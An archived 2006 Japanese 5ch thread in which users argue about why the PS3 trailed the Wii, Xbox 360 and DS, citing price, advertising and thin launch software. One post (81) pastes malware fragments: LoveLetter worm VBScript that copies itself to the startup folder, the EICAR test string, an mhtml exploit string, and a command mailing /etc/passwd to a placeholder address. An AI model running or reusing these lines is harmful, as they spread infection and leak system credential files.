5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【シェア1.9】負け続けるPS3【最下位】

1 :名前は開発中のものです:2006/12/11(月) 11:28:25 ID:gKui33z8
これは、最新の各ゲーム機の売り上げとシェアだ。
http://www.famitsu.com/game/rank/hard/2006/12/07/121,1165475150,64126,0,0.html
PS3が苦戦している。何故負けたのか?


2 :名前は開発中のものです:2006/12/11(月) 11:37:35 ID:Tok3WAIg
まだだ、まだおわらんよ

3 :名前は開発中のものです:2006/12/11(月) 11:37:39 ID:vcZmo3jU


4 :名前は開発中のものです:2006/12/11(月) 11:37:40 ID:U83n/O6I
2ゲト

5 :名前は開発中のものです:2006/12/11(月) 11:38:01 ID:LCMOOX9Y
ソニー聖域にようやくメス

しかし、よりによって、なぜこの時期に経営体制を変更するのか。
SCEは11月にプレイステーションの最新機種「プレイステーション
3 (PS3)」を6年ぶりに日米で発売したばかり。基幹部品の製造が
遅れたことで発売当初に日米合わせて50万台しか用意できず、依然
として店頭では品不足が続いている。しかも、来年3月には欧州での
発売が待ち受けており、供給体制の拡充に向け予断を許さない状況だ。

人事を発表した翌日には、ライバルである任天堂の「Wii」が発売にな
り、米マイクロソフトの「Xbox 360」も全世界で攻勢を強めている。
対抗上実施した値下げや出荷の遅れなどから、ソニーの2007年3月期の
ゲーム事業の営業赤字は、当初計画の約 1.5倍の2000億円にも膨れ上
がる見通しだ。

ttp://www.nikkeibp.co.jp/news/biz06q4/520394/

6 :名前は開発中のものです:2006/12/11(月) 11:38:16 ID:cjw2uxPF
だめ(≧▼≦)

7 :名前は開発中のものです:2006/12/11(月) 11:39:12 ID:gKui33z8
>>1です。
俺は前職がソ○ー社員で、正直悔しい。頑張って欲しい。

負けた理由と、勝つ為の戦略は「広告」の出し方だと思う。
・XBOX360は、各電車冊子やデパート冊子、R25等や大人向け雑誌等に、早めに広告を出していた。
 また、CMもブルドラまでアニメより若者向けのドラマの合間にうつ戦略を出していた。
 狙いは「社会人、子供が居ない若い家族」へ向けた宣伝が目立った。
 そして、最近はブルドラで子供にアピールなど広告が非常に上手い。
 「クールでカッコイイ!」とのイメージ戦略は成功、次世代機が揃った今、売り上げは伸び続けている。

・WIIは、初めから「全ての家族へ」との広告趣旨だった。
 雑誌等の情報は少なかったが、CMは見事に家族みんなでワイワイ楽しむとの趣旨を打ち出した。
 結果、ニュースの街頭インタビューでも、ゲームした事が無いという90歳の老婆さえ買いたいという結果だ。
 DSの延長として、一般人を巻き込む戦略は見事に成功した。
 「オタクだけではなく、みんなのWII」のイメージ戦略は見事に成功した。  

8 :名前は開発中のものです:2006/12/11(月) 11:45:33 ID:q3vAqzd5
>>1です。
では、PS3の広告はどうだったろうか?

・ゲーム機雑誌には沢山情報が載っていたが、一般紙で見る事は直前まで無かった。
 会社の上司など、有楽町へ並んだニュースになるまで存在を知らなかった。 
 また、「どの層にアピールするか?」との戦略が全くなかったように思う。
 子供向けゲームもハッキリせず、オタク向けはガンダムのみ、家族向けは無い。
 結果、「難しいのでは?」とのイメージを抱かせてしまった。また、高すぎる為、子供にはアピールできない。
 結局、PS3のイメージは?というと漠然として分らない。
 今はPS3のイメージは、「メチャクチャ高くて、難しいゲームばかり」(小学生の従兄弟談)と思われてもしかたない。

 

9 :名前は開発中のものです:2006/12/11(月) 11:47:43 ID:q3vAqzd5
続き。
PS3はどの層に売るかハッキリすべきだ。これが勝利のカギだ。
また、これからPS3が勝つにはどうしたらいいのだろうか?

10 :名前は開発中のものです:2006/12/11(月) 11:49:46 ID:+j6D4PXn
  欠陥 設計ミスが広く知れ渡ってしまったからね。

11 :名前は開発中のものです:2006/12/11(月) 11:52:43 ID:CAJ1q+qM
中国ではシェアトップなんじゃない?w

12 :名前は開発中のものです:2006/12/11(月) 11:53:13 ID:oc4Ajzb8
FFが4,5,6と良作が続き人気を高めた状態で7をPSで発表。PSが勝つ決め手となった。
いまのFFは魅力がまったくない。FF12なんか明らかに糞ゲだし、またSFC→PSの時の2Dから3Dポリゴンへという目新しさもない。
なんかカンチガイした空気のFF13の為に糞高いPS3を買う人間がそういるとも思えない。

13 :名前は開発中のものです:2006/12/11(月) 11:55:46 ID:GIFI4Mpn
せっかく儲かってたのに、FF13出したらスクエニ終わるんじゃね?

14 :名前は開発中のものです:2006/12/11(月) 11:57:50 ID:xKR1uNus
【Wiiリモコンで女の子をいじるゲーム開発中】
DSで開発中の話題ソフト魔女裁判に続く、女の子お触りゲームが
Wiiにて開発中。Wiiリモコンでリアルなお触り感覚再現を目指す。

ttp://game10.2ch.net/test/read.cgi/gsaloon/1165797077/

15 :名前は開発中のものです:2006/12/11(月) 11:59:57 ID:X4E+stPb
ソニー聖域にようやくメス

しかし、よりによって、なぜこの時期に経営体制を変更するのか。
SCEは11月にプレイステーションの最新機種「プレイステーション
3 (PS3)」を6年ぶりに日米で発売したばかり。基幹部品の製造が
遅れたことで発売当初に日米合わせて50万台しか用意できず、依然
として店頭では品不足が続いている。しかも、来年3月には欧州での
発売が待ち受けており、供給体制の拡充に向け予断を許さない状況だ。

人事を発表した翌日には、ライバルである任天堂の「Wii」が発売にな
り、米マイクロソフトの「Xbox 360」も全世界で攻勢を強めている。
対抗上実施した値下げや出荷の遅れなどから、ソニーの2007年3月期の
ゲーム事業の営業赤字は、当初計画の約 1.5倍の2000億円にも膨れ上
がる見通しだ。

ttp://www.nikkeibp.co.jp/news/biz06q4/520394/







君は、生き延びる事ができるか?

16 :名無しさん@七周年:2006/12/11(月) 12:03:10 ID:Y8lLcqeK
クタは島流し?

17 :名前は開発中のものです:2006/12/11(月) 12:08:21 ID:dS1Rsmjn
逃げただけだろ
セガを思い出せ。PS3も来年ので生産中止じゃね?

18 :名前は開発中のものです:2006/12/11(月) 12:30:42 ID:tIk/rZuh
ttp://today.reuters.co.jp/news/articlenews.aspx?type=technologyNews&storyID=2006-12-10T193449Z_01_NOOTR_RTRJONC_0_JAPAN-239096-1.xml

(´・ω・`)ショボーン

19 :名前は開発中のものです:2006/12/11(月) 12:32:40 ID:x2ZEWzWt
PSONE、PSX、PSPって何ですか?

20 :名前は開発中のものです:2006/12/11(月) 12:40:54 ID:cQuiV+FJ
>>12
今の糞エニお得意のリメイクでFF7を出せば少しは食指が動くヤシいるんじゃない?

21 :名前は開発中のものです:2006/12/11(月) 12:42:45 ID:86DFYOkz
PS3ライトミックスでるからPS勝ち

22 :名前は開発中のものです:2006/12/11(月) 12:52:33 ID:o84Bqomr
FF7と聖剣伝説3をそれぞれPS3、PSPでだす。
これでなんとかなるだろ。

23 :名前は開発中のものです:2006/12/11(月) 12:56:41 ID:de8oq+eP
・・・ソニー、聖域にようやくメス

PS脂肪

24 :名前は開発中のものです:2006/12/11(月) 13:01:18 ID:X4E+stPb
>>12

FFCC
ttp://www.square-enix.co.jp/ffcc/

こっちに期待するしかない

25 :名前は開発中のものです:2006/12/11(月) 13:08:30 ID:VdMiPRvQ
とにかく高すぎ。

26 :名前は開発中のものです:2006/12/11(月) 13:21:54 ID:JlVmNUAD
値段が高すぎなんだよな。小中高生にどうやって買えと?クリスマスでもお年玉でも無理。FFでようがMH3でようがDQでようが買えねーよ。
Wii2台買っても余裕で釣りが来るじゃねーか、学生舐めんな、値下げするまで絶対買わん。ってか買えん・・・

27 :名前は開発中のものです:2006/12/11(月) 13:28:01 ID:VdMiPRvQ
どんなに国内でも箱◯の方がまだシェアが上というソース出ても、全く無視し続けるGKはもはや精神異常としか思えない。

28 :名前は開発中のものです:2006/12/11(月) 13:29:33 ID:Dak3CUr5
ソニー第三帝國は苦多羅偽の失脚で崩壊か

29 :名前は開発中のものです:2006/12/11(月) 13:33:00 ID:kB13WfJP
すげえ、GBAに勝ってるじゃん

30 :名前は開発中のものです:2006/12/11(月) 13:57:03 ID:Dak3CUr5
>>29
バーチャルボーイにも勝ってる
PS3売れすぎ

31 :名前は開発中のものです:2006/12/11(月) 14:28:15 ID:uwhKFWc8
売れば売るほど赤字だから
全然売る気ないんだろ

32 :名前は開発中のものです:2006/12/11(月) 14:47:32 ID:lun41iNk
PS3在庫あったよ

33 :名前は開発中のものです:2006/12/11(月) 15:57:36 ID:21CVwgPQ
かつてのセガや任天堂と違う点はやはりスクエニか
DCやGCはスクエニがいないから負けたのか











34 :名前は開発中のものです:2006/12/11(月) 16:18:21 ID:VdMiPRvQ
安くすれば・・・。

35 :名前は開発中のものです:2006/12/11(月) 16:21:23 ID:yV11nTXt
●PS3 1月以降発売決定 ソフトラインナップ        ●XBOX360 1月以降発売決定 ソフトラインナップ

NBA 07                                ボンバーマン〜Act:Zero〜
エンチャントアーム                         CALL OF DUTY 2(XB360)
バーチャファイター5                         WWE 2007 SmackDown! VS RAW(XB360)
みんなのGOLF5                           FUZION FRENZY 2
メタルギアソリッド4 ガンズ オブ ザ パトリオット        アイドルマスター(XB360)
新天魔界VI                             アイドルマスター(限定版)(XB360)
ダービースタリオン                         アーマード・コア4(XB360)
デビルメイクライ4
バイオハザード5
モンスターハンター3                        ●Wii 1月以降発売決定 ソフトラインナップ
実況パワフルプロ野球
ウイニングイレブン                         (50本以上あるので省略)
ファイナルファンタジー ヴェルサスXIII              
ファイナルファンタジー13
鉄拳5 DARK RESURRECTION
鉄拳6
フェイタルイナーシャ
ミスト オブ カオス
ブレイドストーム 百年戦争
flOw
マーベルアルティメット アライアンス
湾岸ミッドナイト
パワースマッシュ3
ぼくのなつやすみ3

(書ききれないので以下省略)

36 :名前は開発中のものです:2006/12/11(月) 16:31:00 ID:rDRajrqC
これでPS3が勝ったらある意味すごい

37 :名前は開発中のものです:2006/12/11(月) 16:34:05 ID:Nl8tKkxU
PS3のラインナップのほとんどが
PS2で出してもたいして変わらなくて泣けてくる

38 :名前は開発中のものです:2006/12/11(月) 16:36:28 ID:rDRajrqC
メタルギアって3で完結してんじゃんw

39 :名前は開発中のものです:2006/12/11(月) 16:54:07 ID:GIFI4Mpn
ボンバーマンが入ってる件

40 :名前は開発中のものです:2006/12/11(月) 17:00:24 ID:r6YUYfrp
>>35

●XBOX360 1月以降発売決定 ソフトラインナップ追加

Halo3
HaloWars
ロストオデッセイ
ギアーズオブウォー
バイオハザード5
インフィニットアンディスカバリー
ヴァンパイア レイン
ガンダム オペレーション トロイ
Fatal Inertia
スプリンターセル 二重スパイ
ブレイドストーム -百年戦争
Forza Motorsport2
マグナカルタ2
DEAD OR ALIVER code:Cronus
オペレーション・ダークネス
トラスティベル〜ショパンの夢〜
ライオットアクト
Project Progressive
Saints Row
Sergenal Sense(仮)
Test Drive Unlimited
ブルドラ続編

以下省略

41 :名前は開発中のものです:2006/12/11(月) 17:00:39 ID:LiR9aJnJ
>>33 つ【FFCC】 GCでしかしかも一本だけだけどね。


42 :名前は開発中のものです:2006/12/11(月) 17:09:37 ID:xNZQeDk3
>>35
箱サンロクマルのコール2とボンバー男アクトは発売しとるよ

43 :名前は開発中のものです:2006/12/11(月) 17:09:54 ID:BFAypeF8
宣伝もそうだが、あの値段はマズイよ。>PS3
20GBと60GBに分けたのも失敗。
どうせ買うなら60GB、でもゲームに6マソは…というジレンマが出る。

44 :名前は開発中のものです:2006/12/11(月) 17:09:59 ID:q3vAqzd5
>>35
おまえら最低だな。
売り上げのシェアが最低であるソースも無視。かつ偽造。
そして、ソフト販売予定まで嘘。
PS3プレーヤーの評判を下げるだけだぞ。
最低の状態から如何に立ち上がるか、それを考えず逃げ回るつもりか?

45 :名前は開発中のものです:2006/12/11(月) 17:12:40 ID:BUY4tK2f
これから出る出るより
今現在何があそべるか比べよーぜ

46 :名前は開発中のものです:2006/12/11(月) 17:27:18 ID:GIFI4Mpn
>>45
悪魔め!

47 :名前は開発中のものです:2006/12/11(月) 18:13:48 ID:+3PRzMXv
ばかだなあ、今頃こんなことをいっているやつはあほだよ。WII
はキンキキッズの初登場1位といっしょだろう。

48 :名前は開発中のものです:2006/12/11(月) 18:15:49 ID:Jzjf742B
PS3持ってるけどソフトが全然ないんだから売れるわけないだろ

49 :名前は開発中のものです:2006/12/11(月) 18:17:16 ID:F7JOVwnq
いや、まず出荷しろよって感じなんだが・・・

50 :名前は開発中のものです:2006/12/11(月) 18:18:22 ID:faLz7ZPh
北米でHDDVD爆売れ中
http://www.watch.impress.co.jp/av/docs/20061211/hddvd.htm

・Xbox360のHDDVDプレイヤーは予想を超える売れ行き。需要に答えるのが大変。
・東芝HD-A2(日本ではHD-XF2)は7日に発売され、シアトルBestBuyで売り切れ。
・1年経たずに129タイトル。タイレシオは27枚。
・HD-A2は499$、サムスンのBDプレイヤーは799$。価格競争力あり。
・片面2層HDDVD片面2層DVDの両面コンボディスクが発売されていて訴求力あり。
・BDと比較される容量問題も、VC-1やH264採用で問題なし。
・KingKongは3時間を越えるが画質最高の評価を得ている。容量は十分。
・HDDVDはロスレス圧縮のTrueHD1.5Mbps、BDは非圧縮リニアPCM4.5Mで帯域の無駄
・HDiによるインタラクティブ性。例、BD版のMI3ではコメンタリーなどを楽しめない。
・既にネットワーク機能を全プレイヤーで実装済み。将来は予告編自動DLなども
・HDDVDはDVDフォーラム参加企業なら誰でも生産できる。オープンだ。


51 :名前は開発中のものです:2006/12/11(月) 18:33:46 ID:n/BPbsS5
>>50
つーかHDDVD作ってるメーカー今のところ東芝だけだから東芝ぼろ儲けじゃね?

52 :名前は開発中のものです:2006/12/11(月) 18:42:09 ID:3ie1Sspq
クリスマスに子供にあげるなら?って言われたら間違いなくWiiになるだろう
PS3はとにかく高すぎる
この年末でさらに差広げられるぞ

53 :名前は開発中のものです:2006/12/11(月) 18:55:16 ID:mwLme4K8
BD高いし…

54 :3DO:2006/12/11(月) 18:58:50 ID:M0tx5mjR
PS3はソニーがHDDとブルーレイの争いに勝つための手段として
この時期に発売した。
Wiiはハナから眼中に無い。

だが、肝心のサードパーティにとってはPS2の時よりも遥かに開発費がかさむので、
小さいソフトメーカーがソフトを提供するのが困難になってきた。
中途半端のCGを披露すればPS3の機能を使い切れていないなどと酷評をうけるのが
目に見えるしね。

ゲーマーも過去から幾多の新機種発売を経験してきてるので、
とどのつまりは面白いゲームはハードではなくソフト次第だと気付いている。

んで、今回のPS3は完全に戦略を誤ったと思うなぁ。
オレはハードは全部購入してるのでアンチではないよ。


55 :名前は開発中のものです:2006/12/11(月) 19:35:18 ID:rDRajrqC
早くSCE倒産してくれ

56 :名前は開発中のものです:2006/12/11(月) 19:38:10 ID:ayWPfi1Q
今更だが
>>1
gK乙
誰か>>7のレスで気づいてやれよ…

57 :名前は開発中のものです:2006/12/11(月) 19:41:15 ID:0FJy/rIu
ソニーが潰れたら競争がなくなって市場縮小やん(´・ω・`)

58 :名前は開発中のものです:2006/12/11(月) 19:45:59 ID:rkrh6PSm
箱○無視かよ。
セガだって黙々と力を貯えてるんだぜ。

59 :名前は開発中のものです:2006/12/11(月) 20:24:17 ID:Wret6OJz
ソニーはマーケティングのみでここまできたのにCMがダメとか馬鹿ですか?
高いからそっぽ向かれてるだけなのに滔々と3行以上の長文マジレスって

60 :名前は開発中のものです:2006/12/11(月) 21:00:37 ID:O4MFA1K+
「〜だからさ」というレスがない件について

61 :名前は開発中のものです:2006/12/11(月) 21:10:25 ID:74WSsfRJ
>>60ガノタは逝け

62 :名前は開発中のものです:2006/12/11(月) 21:11:02 ID:RC0wk/14
高価だからさ

63 :名前は開発中のものです:2006/12/11(月) 21:12:10 ID:9KtjCWCK
韻を踏んでるな

64 :名前は開発中のものです:2006/12/11(月) 21:13:38 ID:JyXtGvyl
>>59
マーケティングが命綱なら、
マーケティングが失敗しないとでも?

65 :名前は開発中のものです:2006/12/11(月) 21:36:16 ID:5ekptmB6
DS強すぎワロタ

66 :名前は開発中のものです:2006/12/12(火) 21:49:20 ID:lcnrIZ27
もうどうしたらいいのか。。。

67 :名前は開発中のものです:2006/12/12(火) 21:52:18 ID:7yeJ7+Vw
ろくにソフトが無いんだから遊べる訳無いで仕様

68 :名前は開発中のものです:2006/12/12(火) 22:07:22 ID:k0k/oYSH
どうしようもねえべ

69 :名前は開発中のものです:2006/12/12(火) 22:34:57 ID:D+3SOkmJ
任豚消えろ

70 :名前は開発中のものです:2006/12/12(火) 22:38:32 ID:7aaGC6E/
箱が意外に売れてることに吹いたw

71 :名前は開発中のものです:2006/12/12(火) 22:42:04 ID:Q2a0zZ7s
こりゃあかん
はよソフトださにゃ〜
業界を盛り上げるには
うぃ〜独り勝ちは避けないと…
無理?

72 :名前は開発中のものです:2006/12/12(火) 22:43:52 ID:0KaVDHJk
そもそも、日本人に出回って無いだろ〜。

73 :名前は開発中のものです:2006/12/12(火) 22:45:49 ID:EZT6Fi8a
そういえばPSXってどうなったんだ?
まだ売ってるのか??

74 :名前は開発中のものです:2006/12/12(火) 22:58:26 ID:9liLJgoN




ドラクエに見捨てられたwwww




75 :名前は開発中のものです:2006/12/12(火) 23:00:38 ID:lzTrL5Hb
>>73
PSONEとか言うのも昔無かったっけ?
さっぱり見かけなくなったが

76 :名前は開発中のものです:2006/12/13(水) 05:31:59 ID:rJNGBf1y
http://www.youtube.com/watch?v=j-iXU-h69ak

おい、PS3の意外な隠し玉映像を入手したぞ(´・ω・`)

77 :名前は開発中のものです:2006/12/13(水) 06:04:29 ID:trM2A4b6
ソニーもうだめなの(´・ω・`)?

78 :名前は開発中のものです:2006/12/13(水) 06:31:23 ID:ubCTeMO0
Ps3がこの先生きのこるのは不可能に近いがあえて自分なりの戦略を立ててみる。
・高性能が売りなのでハードの能力のアピール、画像のすごさのアピールをする。
・現状でもコアなユーザーしか付いて来ていないのでさらにコアな物とする。
・ソフトは8000円とかじゃなく3〜5万の範囲でとにかく作りこんでもらう。
・そこでコアユーザーの賞賛をあびつつ一般化を狙う。
・エロゲ参入も◎とにかくコアユーザーに媚びろ!

79 :名前は開発中のものです:2006/12/13(水) 06:38:38 ID:VAZg0QeV
超高画質3Dエロゲ

80 :名前は開発中のものです:2006/12/13(水) 06:42:11 ID:FhLHEXn1
>>78
じゃPCでいいんじゃないかな・・

81 :名前は開発中のものです:2006/12/13(水) 07:07:09 ID:+jlfSK3l
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

82 :名前は開発中のものです:2006/12/13(水) 07:48:03 ID:YAf3L3H7
エロゲとか全然興味なかったけどグラフィックがリアルになればエロにはいいかも。
でも表情の微妙な変化が表現できるのかな?

83 :名前は開発中のものです:2006/12/13(水) 08:00:58 ID:BxB2ZUu/
ソニーおわたー^o^/

84 :名前は開発中のものです:2006/12/13(水) 08:33:32 ID:xkAvSX/T
>>78
PS3がこの先生 まで読んだ

85 :名前は開発中のものです:2006/12/13(水) 08:49:35 ID:qeoEWagy
1.エロゲメーカがこんなハード使いこなせるわけないだろ
2.そもそも3Dエロの需要がすくねぇ
3.紙芝居エロならPS2とかで充分w

86 :名前は開発中のものです:2006/12/13(水) 10:39:17 ID:ui9/9sZx
箱◯にも負けてるって・・・。

87 :名前は開発中のものです:2006/12/13(水) 11:14:45 ID:0eMzQnoA
>>7
宣伝に居た方?
広告を過信し過ぎでしょ
誰が広告してもムダ

衝動買いさせれるレベルの値段じゃないんだし
コンセプトが高級ワインで一般人が買うわけないし




88 :名前は開発中のものです:2006/12/13(水) 11:22:15 ID:YVbj2Alr
ここ貧民が多いしな

89 :名前は開発中のものです:2006/12/14(木) 07:49:02 ID:7EBQL6VM
ゲームソフトがほとんど発売未定だから

90 :名前は開発中のものです:2006/12/14(木) 08:13:54 ID:lyED/xVN
ビデオ屋でレンタルは?

91 :名前は開発中のものです:2006/12/14(木) 08:27:22 ID:lDHBLnH2
>>78
>>84
PS3がこの先生、きのこ
まで読んだ。


92 :名前は開発中のものです:2006/12/14(木) 10:49:52 ID:/g8Ietju
ロンチ少なくて、発売したのは長期的販売戦略を考えたうえ
当然、販売当初のシェアが低いのも考慮ずみ

ただ20Gの売残りは予想外。
あわてて追加CMをながしたのがアレ

93 :名前は開発中のものです:2006/12/18(月) 19:30:22 ID:TYtQwfdw
ソフトシェア1.1%
http://www.famitsu.com/game/rank/hard/2006/12/14/121,1166083761,64486,0,0.html

94 :名前は開発中のものです:2006/12/18(月) 19:34:44 ID:NSHrT29V
>>93
Wiiのグラフおかしくないか?

95 :名前は開発中のものです:2006/12/18(月) 19:35:14 ID:SvMRCDvu
メタル4に興味ないヤツは再来年まで待つしかないみたいだなw

96 :名前は開発中のものです:2006/12/18(月) 20:20:20 ID:ll81q5MW
メタルギアも確かに売れるソフトだが、ハードを牽引するほど力はないよ

97 :名前は開発中のものです:2006/12/18(月) 20:25:38 ID:A94IVZjR
こんな低レベルなこと言ってるから
ゼルダ2週目で17位プギャーされるってことも気づかないのか妊娠は

98 :名前は開発中のものです:2006/12/18(月) 21:09:34 ID:0wK1/lnY
貧民が叩くPS3ネタ 哀れ

99 :名前は開発中のものです:2006/12/18(月) 21:15:30 ID:oQK58Ad6
>>93
Wii大杉じゃない?
PS3もだけど。

100 :名前は開発中のものです:2006/12/18(月) 21:15:44 ID:TSjBquzj
ソース見ると、恐らくハード別ソフト販売割合のグラフを
パッと見、ハード販売台数と錯覚させようって事かな?

ここまでネガティブキャンペーンすると、引くな。

101 :名前は開発中のものです:2006/12/18(月) 21:23:35 ID:u9mCN7Wt

プレイステーション・ドットコムから販売開始のメールが来たぞ。そんなに売れていないのかwPS3

102 :名前は開発中のものです:2006/12/18(月) 21:36:49 ID:lav7l6J3
頭悪いのがたくさんですね^-^

103 :名前は開発中のものです:2006/12/18(月) 21:39:59 ID:WbU0jW3O
おきのどくですが〜 の動画面白いねぇ

普通はあれがない感じで ドラゴンクエスト9 PS3で登場 とかだったら
今WIIと逆だったのかもしれないよね



104 :名前は開発中のものです:2006/12/18(月) 21:49:54 ID:SvMRCDvu
当たり前だけど、次世代ハードのシェアは今が一番少ないんだよね
だからソフト本数いかないのはしょうがない
でもロンチに大作があるのと無いのじゃ大違い 要は選択肢の多さは多いほど良い!
PS3のスケジュールは一体なんなんだよw

105 :名前は開発中のものです:2006/12/18(月) 22:29:37 ID:xzklKuKR
信者は念願のPS3を手に入れた!
しかしソフトが全然無かった
信者はPS3を売ろうとした
だめだ!買い取りしてもらえない!
信者は力尽きた

106 :名前は開発中のものです:2006/12/18(月) 22:41:46 ID:No6UVCzJ
金ない奴ってほんとひがみの奴多いよね(笑)好きでみんなPS3買ったんだからほっとけばいいじゃん!!

107 :名前は開発中のものです:2006/12/18(月) 22:42:06 ID:u9mCN7Wt
でもまあPS3はいろんなところで見かけるし、入荷も多いんじゃないか?
Wiiは全く見かけない

108 :名前は開発中のものです:2006/12/18(月) 22:42:26 ID:QxN2WSV5
うむ ソフトが無い。本題が売ってない。

来年になったら、売れるのかなぁ(−−;)

買えるときになったら買おうっと。いまだに店頭で見てない

109 :名前は開発中のものです:2006/12/18(月) 22:43:17 ID:uMIRodEJ
PS3予約したけど
予約した人がかなり多いらしい
ゲットできるの来年になるかも(>_<)

110 :名前は開発中のものです:2006/12/18(月) 22:45:54 ID:3ggeqpnH
2万円で出せばみんな買うから世界で10億台は売れるとおも。
今からでも遅くないよ2万円で出して。


111 :名前は開発中のものです:2006/12/18(月) 22:50:08 ID:MEjCGgtO
このハイビジョンな時代の中で任豚は汚い画像のゼルダで勝手に引きこもってて下さい。
こちらは綺麗でクリエイティブなソフトで遊んでますから。

112 :名前は開発中のものです:2006/12/18(月) 22:51:33 ID:WlqAo24k
というか、PS3今、ソフトなくね?

113 :名前は開発中のものです:2006/12/18(月) 23:00:38 ID:0TaZv7Dn
ていうか、2011年までに地デジ対応のTVが目標台数確実に売れないから
黄色いビデヲ出力のチューナーを作るように政府が業界に命令したのを知らんのか
ハイビジョンの時代だぁ??家電業界の宣伝にあっさり釣られるバカの意見など必要ない

PS3買ったって、その殆どの人はPS3の高画質を発揮させられないんだYo

114 :名前は開発中のものです:2006/12/18(月) 23:14:39 ID:roB4RtGa
>>93
普通に売れてるな。PS2。
これだけでもPS3が如何に望まれていないかが…

115 :名前は開発中のものです:2006/12/18(月) 23:24:34 ID:MEjCGgtO
すいません
世の中10万円のテレビすら買えない貧乏人がほとんどなんでつね。
m(__)m

116 :名前は開発中のものです:2006/12/18(月) 23:48:53 ID:T5YC09dM
>>115
しかし、貧乏は嫌だね
プラズマハイビジョンで地デジとか見るともうアナログは
一体なんだったんだと思うしな
スカパーの映像も見れたもんじゃない
で360の映像をこれで見るとPS2やWiiなんかどうしようもないと思ふ



117 :名前は開発中のものです:2006/12/18(月) 23:52:25 ID:roB4RtGa
BSDじゃなくて地デジかよ。

118 :名前は開発中のものです:2006/12/18(月) 23:53:48 ID:LHqUow+h
TVなんかニュースと野球とゲームだけだから
ハイビジョンなんかいらねー
それに、家のローンがあるわ子供は私立に受かったわでTVなんか買ってられるか

10万のTVが買えないんじゃない、他に使うことを知らんのかw
独身は無駄金が多くてうらやましいよ

119 :名前は開発中のものです:2006/12/19(火) 00:00:12 ID:bH6Ny1fU
他分野の規格統一戦争の先兵や、新規格普及の牽引役を期待すんなよ。
これだから規格屋は…。βの頃からなんもわかっちゃいねぇ。

120 :名前は開発中のものです:2006/12/19(火) 00:01:46 ID:ssUrJuR/
1年以上前からプラズマ持ってるが
普通にアナログもスカパーも見てる。
PS3買ってもいいが、もうバーチャ
やリッジは飽きたな。

121 :名前は開発中のものです:2006/12/19(火) 00:04:46 ID:zaa9D5xO
どうせ待てば待つほどいいのが出るし、30〜40万するものを
ポンポン買い換えられないから、俺はアナログ放送が終わるころ
フルハイビジョンに買い換えようと思ってる
そんな俺からすればPS3は出すのが5年早かった

122 :名前は開発中のものです:2006/12/19(火) 00:08:39 ID:TmdTEpgc
てゆうか地デジとか俺の人生に”関係ねぇ”と思ってるから

123 :名前は開発中のものです:2006/12/19(火) 00:10:39 ID:bGnACFsg
来年の3月位まで待ってやりたいな。PS3の動向は。

124 :名前は開発中のものです:2006/12/19(火) 00:11:11 ID:8BMm8FoW
>>118
既婚で住宅ローンも払ってますが何か

>>120
地デジ地域外?

>>121
俺はPanaのプラズマで満足してるが
下記が安くて性能いいみたいだぞ
http://www.uniden-direct.jp/store/product/dtlcd_01.html



125 :名前は開発中のものです:2006/12/19(火) 00:13:15 ID:RFCaRva3
>>123
俺もだなあ。知り合いの家はもうハイビジョンで、確かに綺麗で凄いなとは思うんだけど、自分で金払ってまでみたいかとなると俺は遠慮したい
まあ完全移行するときになれば話は別だが、なにもわざわざ今買い換えようとは思えん

126 :名前は開発中のものです:2006/12/19(火) 01:42:01 ID:aNWNwIIJ
地デジ対応テレビなのだが録画はアナログな罠

127 :名前は開発中のものです:2006/12/19(火) 03:25:51 ID:gUAKE15V
家電の値段って結構その家の見栄 嘘のない財政状況表すんだよね
車 服 見た目とかでは 判断不能 見栄の部分がでかいからね
 
マジレスですいません



128 :名前は開発中のものです:2006/12/19(火) 03:29:56 ID:Ao2z8fbR
地デジというかTV見てないからな〜
ニュースでいじめ自殺とかしょうーもない若手笑い芸人の番組ばっかでしょ?
ハイビジョンで力発揮するであろうスポーツなんて結果だけで十分だし・・・
みんなTVなんてみてんの??

129 :名前は開発中のものです:2006/12/19(火) 03:51:59 ID:zeVP1GH/
セブンイレブンでPS3の予約がスタート予定!

12月25日から予約開始で12月31日の間に御予約いただくと1月2日に受け取れます!


詳しくは店員まで

130 :名前は開発中のものです:2006/12/19(火) 03:54:28 ID:zaa9D5xO
>>129
1月2日に受け取れるのを確約できるほど余ってるってことか?

131 :名前は開発中のものです:2006/12/19(火) 04:08:28 ID:Xjabe18m
任天堂の新型ゲーム機「Wii」のリモコンコントローラーの
手離れ問題で15日、

米国のユーザーが「リモコンに欠陥がある」として、
任天堂を相手取り、リモコンの交換や改良を求める訴訟を
米ワシントン州連邦地裁に提訴していたことが分かった。


132 :名前は開発中のものです:2006/12/19(火) 04:08:35 ID:t01DcM6P
近所の山田にず〜と山済みで余ってるんですが何か?

133 :名前は開発中のものです:2006/12/19(火) 05:08:46 ID:i2kWjp7o
>>1
の円グラフ見て髭がPS3の提灯記事書くのもなんとなくわかったかも・・・・
DSがすごすぎる

134 :名前は開発中のものです:2006/12/19(火) 07:30:02 ID:/dh6jLIv
PS3、400万台売れてるんじゃなかったの?
違った?
だれか詳しい方教えて下さい。

135 :名前は開発中のものです:2006/12/19(火) 07:34:33 ID:L9HWRXzY

桁が一つ違う
逆にその情報どこで仕入れたか教えてくれ

136 :名前は開発中のものです:2006/12/19(火) 07:37:24 ID:/dh6jLIv
>>135
親切にありがとうございます。
すみません…0を一つ見落としてたみたいです…。

137 :名前は開発中のものです:2006/12/19(火) 07:46:45 ID:hbLi9RFl
ソニーには出荷数というマジックがあるからな
捌けてるかどうかは別

138 :(・x・)もげら:2006/12/19(火) 07:59:56 ID:XgLI2aBr
SONYはただ画質だけしかこだわってないよ。ゲームに楽しさがない……

139 :名前は開発中のものです:2006/12/19(火) 08:14:33 ID:1dOxSIiA
